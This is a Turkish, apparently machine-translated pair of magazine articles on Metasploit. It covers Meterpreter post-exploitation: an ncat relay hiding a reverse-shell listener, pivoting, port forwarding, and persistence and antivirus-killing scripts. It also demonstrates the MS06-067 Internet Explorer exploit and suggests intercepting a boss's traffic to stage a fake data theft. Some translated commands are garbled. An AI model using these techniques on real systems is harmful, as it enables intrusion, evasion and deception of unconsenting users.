msf> LPORT 6666'yı ayarla
msf> oturumlar –u 1

Sonuç olarak, normal bir kabuğun birçok stresinden ve sınırlamasından kurtuluyoruz.

Bu arada, Meterpreter hakkında. Uzun zamandır diğer platformlara (linux, Macos) aktarmaya çalışıyorlar ancak şu ana kadar her şey yolunda gitmiyor. Ama yine de iyi haberler var: Meterpreter bir şekilde PHP'ye taşındı! "Bir tür" olarak, çünkü tüm işlevler PHP tarafından uygulanamaz, ancak ana işlevler zaten mevcuttur. Böylece onu aşırı yüklenmiş sunucunuza yükleyebilir ve harika bir kabukla oynayabilirsiniz.

Şimdi kendi “güvenliğimizden” bahsedelim. Şu anda çoğu MSF modülü, özellikle savaş iş yükleri için proxy'leri desteklememektedir. Sonuçta keşfedilmek istemiyoruz :). Bu nedenle, eski tarz özelliği olan portforwarding'i hatırlayalım.

Shell’lerin geri bağlanmasını bekleyen MSF’li sunucumuzun “192.168.0.103:5555” konumunda olduğunu varsayalım. Daha sonra netcat'i 80 numaralı bağlantı noktasındaki sahte bir sunucuya kuruyoruz:

ncat --sh-exec “ncat 192.168.0.103 5555” –l 80 --açık tutma

Ve payloadlarda sahte sunucunun IP'sini (veya DNS'sini) ve portunu kaydederiz.
Bu arada, netcat SSL'yi destekler, böylece kabuğun kendisi buna izin vermiyorsa trafiği şifreleyebilirsiniz.

Sömürü sonrası

Evet, şimdi en lezzetli kısma geçelim; sömürü sonrası ve ölçüm cihazı. Umarım Meterpreter'a aşinasınızdır, çünkü size bunun ne kadar iyi olduğunu (ve arkasında neredeyse hiç iz bırakmadığını ve chroot'ta çalıştığını) ve işlevsel (yerleşik hack araçları, kayıt defteri ve dosya sisteminin değiştirilmesi, süreçler ve belirteçler arasında geçiş, yönlendirme) Hiç arzum yok :).

Kurumsal ağdaki bilgisayarlardan birine (192.168.146.129) erişim sağladığımızı ve (192.168.0.102) başarımızı geliştirmek, alt ağı taramak ve başka bir şey yapmak istediğimizi varsayalım.

Msfconsol'a bir rota (alt ızgara, maskesi, yönlendirme oturumu) ekleyin:

msf> rota ekleme 192.168.146.0 255.255.255.0 1

Maalesef nmap bu rotayı kullanmak istemedi - görünüşe göre entegrasyon henüz o kadar derin değil. Ancak sıradan modüller, güvenlik açıkları ve tarayıcılar, bir saldırı geliştirmek için (yani herhangi bir özel ayar olmadan) sakin bir şekilde kullanılabilir (şekle bakın) - MSF, tüm yönlendirme işlemlerini halleder.

Bazı ana bilgisayarların harici ağa (bulunduğumuz yer) sınırlı erişimi olabileceğinden, onlarla iletişim kurmak için önceden oluşturulmuş bir kurban üzerinde bağlantı noktası yönlendirmeyi kullanabilirsiniz, neyse ki, Meterpreter bunu yapabilir:

Meterpreter> portfwd ekle -l 8008 -p 2222 -r 192.168.0.101

Şimdi LHOST=192.168.146.129, LPORT=8008 istismarlarının payloadlarını yazıyoruz ve her şey harika olacak.

Meterpreter'ın harika bir özelliği var: Ruby komut dosyaları aracılığıyla eylemleri otomatikleştirmek. Bu gerçekten havalı. Kullanırken msf3\scripts\meterpreter içindeki mevcut scriptleri görüntüleyebilir, run ve Tab'ı iki kere yazabilirsiniz (bilmeyenler için :)). Betikleri run komutu aracılığıyla manüel olarak veya yüklemeyi/sunucuyu yapılandırırken AutoRunScript veya InitialAutoRunScript değişkenini belirterek çalıştırabilirsiniz. İkinci değişken kabuk başlatılmadan önce, ilk değişken ise sonra yürütülür.

Pakette zaten en standarttan çok sayıda komut dosyası bulunmaktadır:

  • winenum - ağ ayarlarından yüklü yazılımlara ve karmalara kadar sistem hakkındaki tüm bilgileri hızlı bir şekilde toplar;
  • kalıcılık, metsvc – Meterpreter'ı kayıt defterinde veya bir hizmet olarak otomatik başlatmaya kaydeder;
  • getcountermeasure – yangını devre dışı bırakır, çeşitli antivirüslerin ve güvenlik duvarlarının işlemlerini sonlandırabilir.

Bir sonuç yerine

Makalede yeni bir şeyi (en azından Rusça kaynaklar için) ve aynı zamanda bilgisayar korsanlığının tüm aşamalarını anlatmaya çalıştım, bu yüzden sizin için yararlı olacağını umuyorum. Ek olarak, uygulanması gereken birkaç parlak fikir doğdu ve MFS'de birkaç kötü hata vardı, bunların sayının yayınlanmasıyla ortadan kaldırılacağını umuyorum. Genel olarak yaratmak harikadır!

Birkaç ipucu:

  • Otomatik tamamlama, Sekme tuşuna basıldığında msfconsol'da harika çalışır ve tüm komutlar "-h" parametresiyle ilgili yardımı destekler.
  • Bir komutun yürütülmesini duraklatmak istiyorsanız – Ctrl+C, onu arka plana gönderin – Ctrl+Z.
  • Cygwin'de metin kopyalama sol/sağ fare düğmesi kullanılarak yapılır, yapıştırma ise Shift+Insert'tir.
  • Windows altında msfcli, msfpayload vb. arayüzlere erişim. cygwin konsolu aracılığıyla yapılır. Ancak tüm işlevler yeterince çalışmayabileceğinden, iyice test etmeniz önerilir.

PAVEL TROİTSKİ

Metasploit Çerçevesini Kullanarak Güvenlik Açığı Araştırması

Öğrenmek için asla geç değildir ve başkalarına öğretmek hoş bir deneyimdir... Bu makaleden, Metasploit Çerçevesini kullanarak çoğu güvenlik açığının işleyişini ne kadar basit ve net bir şekilde gösterebileceğinizi öğrenebilirsiniz.

Hayatta olup biten her şey daha iyiye doğru... Bir cumartesi sabahı cesurca çalışmam gerekiyordu. Katılıyorum, özellikle izin gününüzde pek hoş bir aktivite değil. Ancak duruma diğer taraftan da bakılabilir.

Birkaç saatlik sabah çalışmasının ardından özgür olduğumda ve hareket halindeyken uyku halindeyken artık eve gitme dürtüsünü hissetmiyordum. Gürültülü günlük hayata kıyasla dinlendirici bir sessizliğin olduğu koridorda süzüldüm. Merakımın nasıl devreye girdiğini hatırlamıyorum; uzaktan klavyedeki tuşlara hızla basıldığında çıkan karakteristik aralıksız sesleri duyunca, otomatik pilotta rotamı değiştirdim ve bir sonraki bölüme demirledim.

Tutkuyla çalışan insanları izlemeyi seviyorum. Adaşım ve meslektaşımın iki monitörün arkasında oturup bir şeye karar verdikleri ortaya çıktı. Boş sandalyelerden birine yavaşça yerleştim, çaydanlığı açtım ve bekledim.

Pashok hayata geri döndü ve beni ancak çaydanlık kaynayıp odadaki termal anahtara yüksek sesle tıkladığında fark etti. Görünüşe göre çaydanlığı ocağa koymaması işe yaramıştı.

Beni görünce hemen kendine bir kahve yaptı, yerine oturdu ve bir çay partisi sırasında bana ruhunu döküp anlayış bulabildiği için çok mutlu oldu. Ve böylece ortaya çıktı. Patronunun kendisine verdiği ilginç bir problemi mikrodenetleyicilerle çözerken, bir yandan da yeterli zamanı olmadığı başka bir görevi düşünüyordu.

İkinci görev birinciye göre daha ilgi çekiciydi, size anlatmaya çalışacağım, sonra da bulduğumuz çözümü sunmaya çalışacağım.

Kapalı kaynak halkın düşmanı mıdır?

Teknik departmanın ve yönetiminin, birçok güvenlik açığını da içeren kapalı kaynak programları kullananlara şüpheyle baktığı bir sır değil. Şirketin yönetimi sorunu anladığında bu iyidir. Teknik departmana yeşil ışık yakılır ve tüm organizasyon, şirket için daha doğru ve güvenli çözümlere yönelir.

Ancak yönetimin arkadaşlarının ve tanıdıklarının görüşlerine dayanarak anlıyormuş gibi davrandığı, ancak aslında anlamadığı başka durumlar da vardır.

Örneğin, Linux, OpenOffice veya Mozilla Firefox tarayıcısının yeni sürümlerinin avantajlarını herkes takdir etmiyor (kapalı ve her zaman kararlı olmayan meslektaşlarıyla karşılaştırıldığında: Windows, MSOffice veya IE).

İnsanlar hareketsizdir, bir şeye alışmıştır ve hiçbir şeyi değiştirmek istemez. Balıklar kafadan çürür - yönetimin teknik departmanın bilgisayarlarına (özellikle dizüstü bilgisayarlarına) erişmesine izin vermediği durumlar vardır, bu sadece güvenlik ihlallerinin kaynağı değil, aynı zamanda rakiplerin entrikalarının ilk hedefidir.

Görevin amacı, teknik departmanın otoritesini yeniden sağlamak, personel için bir giriş dersi vermek ve kurulum ve daha güvenli Açık Kaynak analoglarına geçişle ilgili kararları uygulamak, bunu kendi isteğiyle değil, yukarıdaki yönetimin emriyle belirtmekti. teknik departman.

Görev açık görünüyor, eğer uzun yıllara dayanan bir deneyiminiz varsa, muhtemelen bunda yaşamınızla kesişen bir şeyi veya benzerini görebildiniz. Kurnazlığın ortak amaca fayda sağladığı bir karar durumuna bakalım. Daha ilginç çözümleriniz varsa derginin forumuna yazın, tartışalım!

Çözüm

Nasıl devam edilir? Hemen hemen herkes Küresel Ağı kullandığından ve bu herhangi bir departman için önemli bir tehdit oluşturduğundan, kullanıcıları IE kullanmaktan vazgeçirmek için bir hedef belirleyeceğiz.

Klasiklere dönersek sorunların çözümüne yönelik çok fazla farklı yaklaşım yoktur:

  • kullandığınız tarayıcıyı kontrol ederseniz ve proxy sunucusundaki ağa IE erişimini devre dışı bırakırsanız, bu en iyi çözüm olmayacaktır ve yönetici "manyak" olarak sınıflandırılabilir;
  • IE'yi tüm kullanıcılar için silerseniz, o zaman "aptal" bir yönetici olacaktır ve sorun da çözülmeyecektir;
  • IE'yi çalıştıran kullanıcılara zarar vermeye çalışırsanız, bu "faşist" bir yönetici olacaktır - tüm enerjisini soruşturmaya karşı savaşarak harcayacağı için o da başarıya ulaşamayacaktır.

En doğrusu hileye başvurarak davayla mücadele etmektir. Bir düşünün, eğer tüm kullanıcılar bilinçli olarak bir çözümü reddediyorsa, o zaman iş dünyasında bir üreticinin bu çözümü teşvik etmesinin ne anlamı olabilir?

Bizim düşüncemize en uygun yönetici tipi “teknik eşkıya”dır.

Tarayıcıların nasıl çalıştığına ve içlerinde bulunan güvenlik açıklarına ilişkin çeşitli nüansları inceleyeceğiz, hatalar nedeniyle ortaya çıkan gizli yetenekleri gösteren özel programlar kuracağız ve böylece yönetimi doğru kararı vermeye zorlayacağız.

Sisteminizde güvenlik açıklarını kontrol edin

Herhangi bir büyük programın hataları olduğu açık bir gerçektir. Yönetim dahil hemen hemen herkes bunu anlıyor. Bu nedenle, ağları ve bireysel ana bilgisayarları kontrol etmek için uzun zamandır çeşitli tarayıcılar icat edilmiştir. Ancak herkes işinin ayrıntılarını anlamıyor.

Nessus, Shadow Security Scanner, nmap, XSpider ve diğerleri bir dereceye kadar kullanışlıysa ve kendilerini iyi kanıtlamışlarsa, o zaman neler olduğunu anlayarak onların sonuçlarına güvenmelisiniz.

Örneğin, (bir güvenlik açığı içeren) bir kodun yürütülmesinin kullanıcı tarafında gerçekleştiği ve harici bir tarayıcı tarafından başlatılmadığı durumda ne olacak? Bilgisayarlarını (veya sunucularını) tarayan ve açık bağlantı noktaları ve savunmasız hizmetler bulamayan birçok kişinin yanlışlıkla sistemlerinin mükemmel bir düzende olduğunu düşünmesi bir sır değil.

Metasploit Framework programını kullanan IE tarayıcı örneğini kullanarak bu hatayı kanıtlamaya çalışacağız.

Hareket planı. Küçük bir teori

Güvenlik sorunlarıyla ilgili çeşitli e-postalar aldığınızda veya benzer konulardaki web sitelerini ziyaret ettiğinizde, periyodik olarak çeşitli güvenlik açıklarına ilişkin bilgilerle karşılaşırsınız. Şu veya bu güvenlik açığı, istemciye bir miktar kod aktarmanıza ve onu kendi tarafında yürütmenize olanak tanır; falan veya filan bir güvenlik açığı, uygulamayı sonlandırır.

Teorik olarak şu şekilde çalışır: XXX sitesine gidersiniz ve bunun yerine "format with:" komutunu çalıştıracağınız bir terminal penceresi açılır.

Örnek abartılı ama inanamıyorsanız yazının sonunda siz de benzer bir deneyi kendi evinizde yapabileceksiniz.

Metasploit Projesi

Bu, Metasploit LLC tarafından oluşturulan ve saldırı tespit sistemleri (ASA'lar) için veritabanları geliştirmenin yanı sıra güvenlik açıklarını ve bunların nasıl çalıştığını araştıran kişiler için yararlı bilgiler içeren bir projedir.

Kaynağın amacı, bilinen istismarlar ve güvenlik açıkları ile bunları uygulayan kodlar hakkında çeşitli bilgiler toplamak, böylece bu bilgilerin güvenlik yöneticileri ve geliştiricilerinin kullanımına sunulmasıdır.

Sitede yararlı bilgiler içeren çeşitli bölümler bulunmaktadır.

Planımızın uygulanabileceği platforma ayrılmış bir Çerçeve bölümüne (bkz. Şekil 1) ihtiyacımız olacak.

Aşağıda İndir seçeneğini arayın ve framework-3.2.tar.gz dosyasını indirin.

Metasploit Çerçevesini Yükleme

Daha önce program yalnızca CLI (komut satırı arayüzü) aracılığıyla kullanılabiliyordu ve bu nedenle yalnızca dar çevrelerde biliniyordu.

Yakın zamanda GUI (grafiksel arayüz) desteği eklendi ve bu da programı daha az deneyimli kullanıcılar için daha çekici hale getirdi (özellikle programın Windows sürümünün mevcut olması). Bunun iyi mi kötü mü olduğunu söylemek zor. Linux için bir sürüm ve bir GUI arayüzü seçeceğiz.

İşletim sistemi yakın zamanda piyasaya sürülen Fedora 10'dur. Elbette sorunsuz değildir. Büyük olasılıkla altı aydan bir yıla kadar küçük sorunlar çözülecek ve birçok yöneticinin çalışma platformu haline gelecektir, ancak şimdilik deneylerimiz için çok uygun. Daha önceki sürümleri (Fedora 8, 9) alırsak, kurulumda temel bir farklılık olmamalıdır.

Grafik arayüzün çalışması için Ruby dilini ve kütüphanelerini kurmanız gerekir:

  • ruby-1.8.6.287-2.fc10.i386.rpm;
  • ruby-libs-1.8.6.287-2.fc10.i386.rpm;
  • ruby-gtk2-0.18.0-2.fc10.i386.rpm;
  • ruby-libglade2-0.18.0-2.fc10.i386.rpm;
  • ruby-atk-0.18.0-2.fc10.i386.rpm;
  • ruby-cairo-1.8.0-1.fc10.i386.rpm;
  • ruby-gdkpixbuf2-0.18.0-2.fc10.i386.rpm;
  • ruby-glib2-0.18.0-2.fc10.i386.rpm;
  • ruby-gnome2-0.18.0-2.fc10.i386.rpm;
  • ruby-gnomecanvas2-0.18.0-2.fc10.i386.rpm;
  • ruby-libart2-0.18.0-2.fc10.i386.rpm;
  • ruby-pango-0.18.0-2.fc10.i386.rpm.

Bu, aşağıdaki komutlar kullanılarak manuel olarak yapılabilir:

rpm -ihv *.rpm

veya aracılığıyla:

yum yükle...

o zaman yalnızca ilk dört paketi belirtmeniz yeterlidir; geri kalanların tümü bağımlı olarak tanımlanacak ve kendileri kurulacaktır.

Bir sonraki adım, indirilen framework-3.2.tar.gz arşivini bir dizine açmak, içine girmek ve msfgui dosyasını yönetici haklarıyla çalıştırmaktır.

Programın herhangi bir bağlantı noktasını (örneğin, 80, TCP protokolü) dinlemek üzere yuvaları açabilmesi için yönetici haklarına (kök) ihtiyaç vardır.

Programın başlatılması

Şimdi, güvenlik açıklarını seçerek (Metasploit Framework veritabanında bunlardan birçoğu var), kendi tarafında yürütülmek üzere istemciye aktarılacak kodu üretecek bir sunucu uygulamaya çalışabiliriz. Daha sonra istemciyi güvenlik açığı açısından kontrol edeceğiz. Eldeki ilk makine savunmasız makine olarak seçildi, yani Windows 2003 ve IE 6.0 (bkz. Şekil 5). Bu arada, bazı yöneticiler, kendilerini rahatsız etmeden, doğrudan sunucu konsolundan kendilerini ilgilendiren sorularla ilgili olarak İnternette bir şeyler ararlar, ancak alternatif tarayıcılar kurmazlar ve bu tür İnternet erişiminin "yolda" olduğunu öne sürerler. sunucu odasının dizinde” nadirdir. Bir sunucunun tehlikeye atılması için yalnızca bir durumun yeterli olduğunu belirtmek isterim!


Ve sonra durum basit: asıl görev, kurbanı veya her şeyi bilen patronu bilgisayarımıza çekmek. İnternette bu, sosyal olarak, yani dolambaçlı bir şekilde çözülür. Örneğin, çeşitli bannerlar yerleştirerek veya zaten virüs bulaşmış sitelerden açılır pencereler aracılığıyla yönlendirme yaparak. Bu genellikle sizi bir banner'a tıklamaya davet eden şüpheli sitelerde (ticari programların ücretsiz indirilmesi, porno siteleri vb.) meydana gelir.

Yerel bir ağda, yöneticileri olarak, ağ geçidindeki isteği ihtiyaç duyduğumuz yerde kapatabilir ve ardından patrona, tamamen zararsız herhangi bir sitenin bilgisayarında harikalar yaratabileceğini (diğer uygulamaları çalıştırabilir, belgelerini kopyalayabilir vb.) gösterebiliriz. , çalışan bir antivirüsün bile olması şartıyla.

Elbette tüm bu eylem çeşitliliği sizin hayal gücünüze bağlıdır ve makalenin amacı yalnızca yönü ve neyin mümkün olduğunu göstermektir. Bu nedenle, örnek olarak kendimizi yalnızca bir güvenlik açığıyla sınırlayacağız ve kurbanın bilgisayarında "Hesap Makinesi" gibi zararsız bir program başlatacağız. Kimseyi kandırmamak adına bu makaleyi yazmak için, bu konfigürasyonda işe yarayan bir güvenlik açığı bulmak için yarım saat boyunca güvenlik açıklarını incelemek zorunda kaldığım bir sır değil.

Microsoft Güvenlik Bülteni MS06-067'de açıklanan güvenlik açığı seçildi - bu güvenlik açığını program veritabanında seçin (bkz. Şekil 6).

Bağlantı noktası 8081'i ve güvenlik açığı bulunan "c:\windows\system32\calc.exe" tarayıcısına sahip bir makinede çalıştırılacak komutu belirtiyoruz (bkz. Şekil 8).

Not: 80 numaralı bağlantı noktasını kaydetmek istiyorsanız ve bir httpd sunucusu çalıştırıyorsanız, bunu örneğin şu komutla durdurmayı unutmayın:

# hizmet httpd durağı

veya:

# /etc/rc.d/init.d/httpd durdur

Aksi takdirde, gelen bağlantılar için iki programdan hangisinin bağlantı noktasını dinlemesi gerektiği açık değildir. Bu amaçla örnekte 8081 numaralı bağlantı noktası kullanılmaktadır ve bunun ücretsiz olacağı açıktır.

Ayarları onayladıktan sonra (bkz. Şekil 9) ve asılı işler (işler) listesinde yeni bir görevimiz var (bkz. Şekil 10).

Kurbanın arabasının penceresi (bkz. Şekil 11).

Çözüm

Elbette bu örnek önemsizdir ve başkalarını veya patronunuzu etkilemek için ayrıntıları dikkate alarak onu değiştirmek daha iyidir. Herhangi bir eylemin (değişimin) bizi daha çok çekeceği şekilde tasarlandık, bu nedenle arabellek taşmasının nasıl oluştuğunu gerçekten anlamayan kişiler için, hesap makinesi yerine tuşlarla bir arşivleyici çalıştırmak daha iyidir, böylece içinde animasyon olur. penceresinde, örneğin sıkıştırılmış yüzdelerin sayısı, “Belgelerim\Gizli” klasöründeki dosyaları “çalıştırır”. O zaman bu sitenin patronunuzun bilgisayarından bilgi toplamayı amaçladığını söylemek daha kolay olacak ve argümanlarınız daha güçlü olacaktır. Site bir tür hesap makinesi değil de bir arşivleyici başlattığından, sorun çok daha ciddidir. Yine de bu satırları okuyan çoğu okuyucunun bir kez daha gülümseyeceğini umuyorum.

Bu makale ve örnek aynı zamanda eğitim amaçlı da kullanılabilir. Neden güvenlik kurslarındaki veya üniversitelerdeki öğretmenler için gösteriler veya laboratuvar çalışmaları yürütme konusunda bir rehber olmasın? Öğrenciler için bu tür laboratuvar çalışmaları yapmak, her zaman net olmayan sonuçları hesaplamaktan çok daha ilginç olacaktır.

Sisteminizi veya tarayıcınızı güncelleme/değiştirme zamanının gelip gelmediğini merak ediyorsanız doğru yoldasınız!

  1. Robachevsky A. M. UNIX işletim sistemi. – St. Petersburg: BHV-Petersburg, 2002, ISBN 5-8206-0030-4.
  2. Çeşitli güvenlik açıklarına ilişkin bilgiler ve istismarlar içeren Metasploit Projesi'nin web sitesi http://metasploit.com'dur.
  3. Microsoft Güvenlik Bülteni Güvenlik Açığı MS06-067 – http://www.microsoft.com/technet/security/Bulletin/MS06-067.mspx.

Temas halinde